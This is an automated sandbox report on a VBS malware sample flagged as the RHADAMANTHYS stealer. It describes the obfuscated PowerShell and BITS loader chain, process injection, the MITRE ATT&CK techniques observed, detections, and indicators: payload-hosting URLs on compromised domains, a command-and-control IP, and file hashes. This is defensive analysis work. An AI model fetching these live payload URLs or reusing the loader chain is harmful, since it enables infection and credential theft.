                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RHADAMANTHYS Stealer
                    Source: Yara matchFile source: 00000007.00000003.2571764775.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000003.2576375337.0000000003520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000003.2666601703.0000000005685000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.2585733508.0000000024FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Yara detected RHADAMANTHYS Stealer
                    Source: Yara matchFile source: 00000007.00000003.2571764775.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000003.2576375337.0000000003520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3339874857.0000000005941000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000003.2666601703.0000000005685000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.2585733508.0000000024FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Windows\SysWOW64\dialer.exeCode function: 9_2_05949A57 socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError,9_2_05949A57

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information221
                    Scripting                    		Valid Accounts11
                    Windows Management Instrumentation                    		1
                    BITS Jobs                    		111
                    Process Injection                    		1
                    Masquerading                    		21
                    Input Capture                    		121
                    Security Software Discovery                    		Remote Services21
                    Input Capture                    		11
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter                    		221
                    Scripting                    		1
                    DLL Side-Loading                    		41
                    Virtualization/Sandbox Evasion                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol1
                    Archive Collected Data                    		1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Exploitation for Client Execution                    		1
                    DLL Side-Loading                    		Logon Script (Windows)1
                    BITS Jobs                    		Security Account Manager41
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    PowerShell                    		Login HookLogin Hook111
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information                    		LSA Secrets1
                    File and Directory Discovery                    		SSHKeylogging13
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Software Packing                    		Cached Domain Credentials123
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578227 Sample: F8HYX5HOgA.vbs Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 31 www.royalengineeringllc.com 2->31 33 www.astenterprises.com.pk 2->33 35 2 other IPs or domains 2->35 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus / Scanner detection for submitted sample 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 6 other signatures 2->57 10 wscript.exe 1 2->10         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 63 VBScript performs obfuscated calls to suspicious functions 10->63 65 Suspicious powershell command line found 10->65 67 Wscript starts Powershell (via cmd or directly) 10->67 69 2 other signatures 10->69 16 powershell.exe 24 10->16         started        41 astenterprises.com.pk 107.161.23.150, 443, 49707, 49708 RAMNODEUS United States 13->41 43 127.0.0.1 unknown unknown 13->43 signatures6 process7 signatures8 45 Suspicious powershell command line found 16->45 47 Powershell uses Background Intelligent Transfer Service (BITS) 16->47 49 Found suspicious powershell code related to unpacking or dynamic code loading 16->49 19 powershell.exe 23 16->19         started        22 conhost.exe 16->22         started        process9 signatures10 59 Writes to foreign memory regions 19->59 61 Found suspicious powershell code related to unpacking or dynamic code loading 19->61 24 wab.exe 1 6 19->24         started        process11 dnsIp12 37 royalengineeringllc.com 103.120.177.150, 443, 49771 NETMAGIC-APNetmagicDatacenterMumbaiIN India 24->37 27 dialer.exe 24->27         started        process13 dnsIp14 39 91.92.252.226, 49815, 49836, 49862 THEZONEBG Bulgaria 27->39 71 Switches to a custom stack to bypass stack traces 27->71 signatures15

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    F8HYX5HOgA.vbs46%VirustotalBrowse
                    F8HYX5HOgA.vbs42%ReversingLabsScript-WScript.Trojan.Malgent
                    F8HYX5HOgA.vbs100%AviraVBS/kab.Talu.ace5b8

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.microsoft.co/0%Avira URL Cloudsafe
                    https://www.astenterprises.com.pk:443/ms/Spej.ttf0%Avira URL Cloudsafe
                    https://www.astenterprises.com.pk/0%Avira URL Cloudsafe
                    https://www.astenterprises.com.pk/ice0%Avira URL Cloudsafe
                    https://www.royalengineeringllc.com/ms/ms.bin0t0%Avira URL Cloudsafe
                    https://www.astenterprises.com.pk/ms/Spej.ttf0%Avira URL Cloudsafe
                    https://www.astenterprises.com.pk/ms/Spej.ttfP0%Avira URL Cloudsafe
                    https://www.royalengineeringllc.com/ms/ms.binGu0%Avira URL Cloudsafe
                    https://www.astenterprises.com.pk/ms/Spej.ttfXR0%Avira URL Cloudsafe
                    https://www.royalengineeringllc.com/ms/ms.bin0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    astenterprises.com.pk
                    		107.161.23.150
                    		truefalse
                      		high
                      royalengineeringllc.com
                      		103.120.177.150
                      		truefalse
                        		unknown
                        www.astenterprises.com.pk
                        		unknown
                        		unknownfalse
                          		high
                          www.royalengineeringllc.com
                          		unknown
                          		unknownfalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://www.royalengineeringllc.com/ms/ms.binfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.astenterprises.com.pk/ms/Spej.ttffalse
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2827287313.000002316EE70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2538723366.00000000046AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2538723366.00000000046AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://go.micropowershell.exe, 00000001.00000002.2709173693.000002315FF93000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.astenterprises.com.pk/ms/Spej.ttfPpowershell.exe, 00000001.00000002.2709173693.000002315EFBA000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://contoso.com/Licensepowershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Iconpowershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl.ver)svchost.exe, 00000004.00000002.3339991717.000002A7978A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000004.00000003.2090170168.000002A79CD20000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.astenterprises.com.pk/icesvchost.exe, 00000004.00000002.3341271659.000002A79CE84000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2538723366.00000000046AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.astenterprises.com.pk/svchost.exe, 00000004.00000002.3341467361.000002A79CEED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3341611453.000002A79CF0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://g.live.com/odclientsettings/Prod/C:svchost.exe, 00000004.00000003.2090170168.000002A79CD93000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.micropowershell.exe, 00000005.00000002.2550855628.0000000007F10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.astenterprises.com.pk/ms/Spej.ttfXRpowershell.exe, 00000005.00000002.2538723366.00000000046AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.microsoft.co/powershell.exe, 00000005.00000002.2544913073.00000000070F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://contoso.com/powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2827287313.000002316EE70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2541535117.00000000055F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://aka.ms/pscore6lBjqpowershell.exe, 00000005.00000002.2538723366.0000000004591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.astenterprises.com.pk:443/ms/Spej.ttfsvchost.exe, 00000004.00000002.3341271659.000002A79CE84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3341271659.000002A79CE61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://aka.ms/pscore68powershell.exe, 00000001.00000002.2709173693.000002315EE01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.royalengineeringllc.com/ms/ms.bin0twab.exe, 00000007.00000002.2594065641.0000000008902000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2709173693.000002315EE01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2538723366.0000000004591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.royalengineeringllc.com/ms/ms.binGuwab.exe, 00000007.00000002.2594065641.0000000008902000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            107.161.23.150
                                                            		astenterprises.com.pkUnited States
                                                            		3842RAMNODEUSfalse
                                                            91.92.252.226
                                                            		unknownBulgaria
                                                            		34368THEZONEBGfalse
                                                            103.120.177.150
                                                            		royalengineeringllc.comIndia
                                                            		17439NETMAGIC-APNetmagicDatacenterMumbaiINfalse

                                                            Private

                                                            IP
                                                            127.0.0.1

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1578227
                                                            Start date and time:2024-12-19 12:46:54 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 8m 43s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:10
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:F8HYX5HOgA.vbs
                                                            renamed because original name is a hash value
                                                            Original Sample Name:ace5b87a91d37f57a3288800b585268dbc4c1efde0417521f98b1fd4b86beff1.vbs
                                                            Detection:MAL
                                                            Classification:mal100.troj.expl.evad.winVBS@11/11@3/4
                                                            EGA Information:
                                                            • Successful, ratio: 50%
                                                            HCA Information:
                                                            • Successful, ratio: 60%
                                                            • Number of executed functions: 65
                                                            • Number of non-executed functions: 31
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .vbs

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target powershell.exe, PID 4856 because it is empty
                                                            • Execution Graph export aborted for target wab.exe, PID 2780 because there are no executed function
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            06:47:47API Interceptor124x Sleep call for process: powershell.exe modified
                                                            06:47:49API Interceptor2x Sleep call for process: svchost.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            107.161.23.150KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                              1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                  R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                    2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                      tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                        FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                          yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                            0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                              List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                91.92.252.226tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                  103.120.177.150tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    NETMAGIC-APNetmagicDatacenterMumbaiINtmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                    • 103.120.177.150
                                                                                    akcqrfutuo.elfGet hashmaliciousUnknownBrowse
                                                                                    • 123.108.47.170
                                                                                    jew.x86.elfGet hashmaliciousUnknownBrowse
                                                                                    • 103.227.39.94
                                                                                    arm7.nn-20241201-1515.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 164.52.192.3
                                                                                    SecuriteInfo.com.Win32.RATX-gen.3030.23832.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 205.147.111.116
                                                                                    la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                    • 123.108.36.64
                                                                                    la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                    • 103.225.99.96
                                                                                    la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                    • 203.112.146.8
                                                                                    ATT037484_Msg#189815.htmlGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                    • 164.52.219.207
                                                                                    na.elfGet hashmaliciousGafgytBrowse
                                                                                    • 103.214.114.30
                                                                                    THEZONEBGtmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                    • 91.92.252.226
                                                                                    cclent.exeGet hashmaliciousQuasarBrowse
                                                                                    • 91.92.243.191
                                                                                    cobaltstrike.dllGet hashmaliciousCobaltStrikeBrowse
                                                                                    • 91.92.250.70
                                                                                    sample.binGet hashmaliciousOkiruBrowse
                                                                                    • 91.92.246.113
                                                                                    mirai.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                    • 85.217.215.190
                                                                                    SecuriteInfo.com.Win32.BotX-gen.7614.10551.exeGet hashmaliciousUnknownBrowse
                                                                                    • 91.92.242.236
                                                                                    Scan_Revised-SOP_MCA_pdf.jsGet hashmaliciousWSHRATBrowse
                                                                                    • 91.92.243.39
                                                                                    na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                    • 85.217.208.78
                                                                                    m7DmyQOKD7.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                    • 91.92.255.109
                                                                                    mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                                                                    • 91.92.246.113
                                                                                    RAMNODEUSKcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                    • 107.161.23.150
                                                                                    1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                    • 107.161.23.150
                                                                                    8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                    • 107.161.23.150
                                                                                    R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                    • 107.161.23.150
                                                                                    2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                    • 107.161.23.150
                                                                                    tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                    • 107.161.23.150
                                                                                    FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 107.161.23.150
                                                                                    yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 107.161.23.150
                                                                                    0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 107.161.23.150
                                                                                    List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                    • 107.161.23.150

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    28a2c9bd18a11de089ef85a160da29e4tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                    • 107.161.23.150
                                                                                    JiZQEd33mn.exeGet hashmaliciousUnknownBrowse
                                                                                    • 107.161.23.150
                                                                                    urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                    • 107.161.23.150
                                                                                    https://walli.shanga.co/image/view/?id=1375Get hashmaliciousUnknownBrowse
                                                                                    • 107.161.23.150
                                                                                    Doc_16-48-43.jsGet hashmaliciousUnknownBrowse
                                                                                    • 107.161.23.150
                                                                                    Doc_16-48-43.jsGet hashmaliciousUnknownBrowse
                                                                                    • 107.161.23.150
                                                                                    Doc_23-03-27.jsGet hashmaliciousUnknownBrowse
                                                                                    • 107.161.23.150
                                                                                    Doc_23-03-27.jsGet hashmaliciousUnknownBrowse
                                                                                    • 107.161.23.150
                                                                                    Recommended Itinerary.jsGet hashmaliciousUnknownBrowse
                                                                                    • 107.161.23.150
                                                                                    d2W4YpqsKg.lnkGet hashmaliciousLummaCBrowse
                                                                                    • 107.161.23.150
                                                                                    37f463bf4616ecd445d4a1937da06e19tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                    • 103.120.177.150
                                                                                    t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                    • 103.120.177.150
                                                                                    Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    • 103.120.177.150
                                                                                    Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                    • 103.120.177.150
                                                                                    main.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                    • 103.120.177.150
                                                                                    deb.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                    • 103.120.177.150
                                                                                    iviewers.dllGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                    • 103.120.177.150
                                                                                    script.ps1Get hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                    • 103.120.177.150
                                                                                    66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 103.120.177.150
                                                                                    pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                                                    • 103.120.177.150

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1310720
                                                                                    Entropy (8bit):0.8509429890245575
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugR:gJjJGtpTq2yv1AuNZRY3diu8iBVqFM
                                                                                    MD5:E102167EB77C9B660CFE03B25C821DF3
                                                                                    SHA1:4241858558451CD2CD401B2E84D1734AC47ABB42
                                                                                    SHA-256:F65D73AA7A76800CE2EEED3DA6B5409EAB675103C5C9287F0A5628BA557BCF94
                                                                                    SHA-512:73618EB210199EC004480FC2A4479BBD22A0D28936DA6BE853D43D5417C429ABF3EC3BA6B7049EACD8E26EA6B84115373B79D250B7523FA3EEC4770CE532871C
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x27df1bf6, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                    Category:dropped
                                                                                    Size (bytes):1310720
                                                                                    Entropy (8bit):0.6585668390866111
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:BSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Baza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                    MD5:42EA7FADE870966F496A555AA05F170F
                                                                                    SHA1:3A4E43A218CDBCB1E109F5DDE5F7F99127995428
                                                                                    SHA-256:CB6B60CC6374F0E570D5F8D003E9131E8374FA34FD14B169A42E3748919D2C9A
                                                                                    SHA-512:E58FC7E10DCCCFBEEB15708349F66641130DB788542D3026B0005901659500E14F9E1D4E1DE12ACDA1CC554630E710E7197971DC7134A3169F531ADC051819DA
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:'...... ...............X\...;...{......................0.z..........{..1/...|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{...................................S.1/...|..................2t..1/...|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):16384
                                                                                    Entropy (8bit):0.08123843754856074
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:VS1KYejtZGkGuAJkhvekl1c4ZG1allrekGltll/SPj:IKzjNrxl2OJe3l
                                                                                    MD5:F144A4A54BBDE44147B1F726A994A77F
                                                                                    SHA1:B286EA7C3D89536990E98AE0F68643FFAB3C08BF
                                                                                    SHA-256:A0F2A2BFC0FD649265EEB46CB3C08E719CD8CD61E0A014A46BD6A8DFBFD4C9C8
                                                                                    SHA-512:B168839E1ED5049F85C6FB39ED6E410F1D0DCB8F444A8B85B0EB46DF8CC2255FEDD90B47C93797B9F171302205A29C675A487C59620ED66670E7A0FE5D997FD4
                                                                                    Malicious:false
                                                                                    Preview:..|.....................................;...{..1/...|.......{...............{.......{...XL......{..................2t..1/...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:modified
